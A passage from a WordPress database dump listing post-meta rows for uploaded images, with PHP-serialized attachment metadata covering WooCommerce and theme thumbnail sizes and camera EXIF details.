ime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(11918,4922,'_wp_attached_file','2020/04/logo-little-heart.png'),(11919,4922,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1800;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2020/04/logo-little-heart.png\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"logo-little-heart-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"logo-little-heart-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"logo-little-heart-600x200.png\";s:5:\"width\";i:600;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"logo-little-heart-300x100.png\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"logo-little-heart-1024x341.png\";s:5:\"width\";i:1024;s:6:\"height\";i:341;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"logo-little-heart-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"logo-little-heart-768x256.png\";s:5:\"width\";i:768;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"logo-little-heart-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"logo-little-heart-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:30:\"logo-little-heart-1536x512.png\";s:5:\"width\";i:1536;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"logo-little-heart-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"logo-little-heart-1100x550.png\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"logo-little-heart-550x600.png\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"logo-little-heart-1100x600.png\";s:5:\"width\";i:1100;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"logo-little-heart-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"logo-little-heart-600x200.png\";s:5:\"width\";i:600;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"logo-little-heart-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11920,4923,'_wp_attached_file','2020/04/logo-little-heart-1.png'),(11921,4923,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1800;s:6:\"height\";i:600;s:4:\"file\";s:31:\"2020/04/logo-little-heart-1.png\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"logo-little-heart-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"logo-little-heart-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"logo-little-heart-1-600x200.png\";s:5:\"width\";i:600;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"logo-little-heart-1-300x100.png\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"logo-little-heart-1-1024x341.png\";s:5:\"width\";i:1024;s:6:\"height\";i:341;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"logo-little-heart-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"logo-little-heart-1-768x256.png\";s:5:\"width\";i:768;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"logo-little-heart-1-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"logo-little-heart-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"logo-little-heart-1-1536x512.png\";s:5:\"width\";i:1536;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"logo-little-heart-1-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"logo-little-heart-1-1100x550.png\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"logo-little-heart-1-550x600.png\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:32:\"logo-little-heart-1-1100x600.png\";s:5:\"width\";i:1100;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"logo-little-heart-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"logo-little-heart-1-600x200.png\";s:5:\"width\";i:600;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"logo-little-heart-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11922,4924,'_wp_attached_file','2020/04/Long-orange-banan.jpg'),(11923,4924,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1285;s:6:\"height\";i:437;s:4:\"file\";s:29:\"2020/04/Long-orange-banan.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"Long-orange-banan-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-600x204.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-300x102.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan-1024x348.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:348;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-768x261.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-550x437.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan-1100x437.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-550x437.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan-1100x437.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"Long-orange-banan-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-600x204.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552031192\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(11924,4925,'_wp_attached_file','2020/04/Long-orange-banan-1.jpg'),(11925,4925,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1285;s:6:\"height\";i:437;s:4:\"file\";s:31:\"2020/04/Long-orange-banan-1.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"Long-orange-banan-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"Long-orange-banan-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"Long-orange-banan-1-600x204.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"Long-orange-banan-1-300x102.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"Long-orange-banan-1-1024x348.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:348;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"Long-orange-banan-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"Long-orange-banan-1-768x261.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"Long-orange-banan-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"Long-orange-banan-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"Long-orange-banan-1-550x437.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"Long-orange-banan-1-1100x437.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"Long-orange-banan-1-550x437.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:32:\"Long-orange-banan-1-1100x437.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"Long-orange-banan-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"Long-orange-banan-1-600x204.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"Long-orange-banan-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552031192\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(11926,4926,'_wp_attached_file','2020/04/IMG_0003-scaled.jpg'),(11927,4926,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2560;s:6:\"height\";i:1205;s:4:\"file\";s:27:\"2020/04/IMG_0003-scaled.jpg\";s:5:\"sizes\";a:18:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"IMG_0003-scaled-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"IMG_0003-scaled-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"IMG_0003-scaled-600x282.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:282;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0003-300x141.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0003-1024x482.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:482;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0003-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0003-768x361.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:361;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0003-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"IMG_0003-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"IMG_0003-1536x723.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:723;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:21:\"IMG_0003-2048x964.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:964;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"IMG_0003-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"IMG_0003-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"IMG_0003-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"IMG_0003-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"IMG_0003-scaled-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"IMG_0003-scaled-600x282.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:282;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"IMG_0003-scaled-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552034264\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11928,4927,'_wp_attached_file','2020/04/IMG_0005-scaled.jpg'),(11929,4927,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2560;s:6:\"height\";i:1077;s:4:\"file\";s:27:\"2020/04/IMG_0005-scaled.jpg\";s:5:\"sizes\";a:18:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"IMG_0005-scaled-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"IMG_0005-scaled-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"IMG_0005-scaled-600x252.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0005-300x126.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:126;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0005-1024x431.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0005-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0005-768x323.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:323;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0005-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"IMG_0005-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"IMG_0005-1536x646.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:21:\"IMG_0005-2048x861.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:861;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"IMG_0005-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"IMG_0005-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"IMG_0005-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"IMG_0005-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"IMG_0005-scaled-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"IMG_0005-scaled-600x252.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"IMG_0005-scaled-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552094044\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11930,4928,'_wp_attached_file','2020/04/IMG_0006.jpg'),(11931,4928,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:670;s:6:\"height\";i:1027;s:4:\"file\";s:20:\"2020/04/IMG_0006.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_0006-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0006-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_0006-600x920.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:920;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0006-196x300.jpg\";s:5:\"width\";i:196;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0006-668x1024.jpg\";s:5:\"width\";i:668;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0006-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0006-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"IMG_0006-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"IMG_0006-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"IMG_0006-670x550.jpg\";s:5:\"width\";i:670;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"IMG_0006-550x1027.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1027;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"IMG_0006-300x300.jpg\";s:5: